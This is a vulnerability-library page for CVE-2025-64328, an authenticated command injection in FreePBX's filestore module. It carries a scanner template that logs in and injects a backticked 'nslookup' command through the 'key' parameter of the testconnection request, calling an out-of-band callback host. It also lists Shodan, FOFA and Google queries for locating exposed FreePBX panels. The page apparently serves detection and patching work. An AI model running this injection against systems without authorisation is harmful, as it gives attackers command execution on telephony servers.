/Vulnerability Library

FreePBX >= 17.0.2.36 && < 17.0.3 - Authenticated Command Injection

CVE-2025-64328
Verified

Description

FreePBX Endpoint Manager 17.0.2.36 to < 17.0.3 contains a command injection caused by improper sanitization in filestore module's testconnection check_ssh_connect() function, letting authenticated users execute commands as asterisk user.

Severity

Critical

CVSS Score

8.6

Exploit Probability

82%

Affected Product

freepbx

Published Date

March 7, 2026

Template Author

_th3y

CVE-2025-64328.yaml
id: CVE-2025-64328

info:
  name: FreePBX  >= 17.0.2.36 && < 17.0.3 - Authenticated Command Injection
  author: _th3y
  severity: critical
  description: |
    FreePBX Endpoint Manager 17.0.2.36 to < 17.0.3 contains a command injection caused by improper sanitization in filestore module's testconnection  check_ssh_connect() function, letting authenticated users execute commands as asterisk user.
  impact: |
    Authenticated attackers can execute arbitrary commands as the asterisk user, gaining remote access to the system.
  remediation: |
    Upgrade to version 17.0.3 or later.
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
    cvss-score: 8.6
    cve-id: CVE-2025-64328
    epss-score: 0.82118
    epss-percentile: 0.99227
    cpe: cpe:2.3:a:sangoma:freepbx:*:*:*:*:*:*:*:*
  reference:
    - https://github.com/FreePBX/security-reporting/security/advisories/GHSA-vm9p-46mv-5xvw
    - https://theyhack.me/CVE-2025-64328-FreePBX-Authenticated-Command-Injection/
    - https://www.cisa.gov/news-events/alerts/2026/02/03/cisa-adds-four-known-exploited-vulnerabilities-catalog
  metadata:
    vendor: sangoma
    product: freepbx
    shodan-query:
      - http.title:"freepbx"
      - http.favicon.hash:"-1908328911"
      - http.favicon.hash:"1574423538"
      - http.title:"freepbx administration"
    fofa-query:
      - icon_hash="-1908328911"
      - icon_hash="1574423538"
      - title="freepbx administration"
      - title="freepbx"
    google-query:
      - intitle:"freepbx administration"
      - intitle:"freepbx"
  tags: cve,cve2025,freepbx,rce,oast,authenticated,vuln,kev,vkev

variables:
  username: "{{username}}"
  password: "{{password}}"
  cmd: "nslookup {{interactsh-url}}"
  prefix: "{{rand_text_alpha(5)}}"

flow: http(1) && http(2)


http:
  - method: POST
    path:
      - "{{BaseURL}}/admin/config.php"
    headers:
      Content-Type: application/x-www-form-urlencoded
    body: "username={{username}}&password={{password}}"

    matchers:
      - type: word
        part: body
        words:
          - 'FreePBX Administration'
          - 'Hello, {{username}}'
        condition: and
        internal: true

  - method: GET
    path:
      - "{{BaseURL}}/admin/ajax.php?module=filestore&command=testconnection&driver=SSH&host=127.0.0.1&user={{prefix}}&port=22&key={{prefix}}`{{cmd}}`&path={{prefix}}"
    headers:
      Referer: "{{BaseURL}}"

    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
          - "http"
# digest: 4a0a00473045022100a838f0bc4fe65c6cdf5f2474ed4f6438286ba6b1e446afe995a287b182b29fab02202aca2f96db3ab4940119a95ce25917adca51dfcb1dc6d418bc5e1ce78aa681ba:922c64590222798bb761d5b6d8e72950
8.6Score

CVSS Metrics

CVSS Vector:
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
CVE ID:
cve-2025-64328

References

https://github.com/FreePBX/security-reporting/security/advisories/GHSA-vm9p-46mv-5xvwhttps://theyhack.me/CVE-2025-64328-FreePBX-Authenticated-Command-Injection/https://www.cisa.gov/news-events/alerts/2026/02/03/cisa-adds-four-known-exploited-vulnerabilities-catalog

Remediation Steps

Upgrade to version 17.0.3 or later.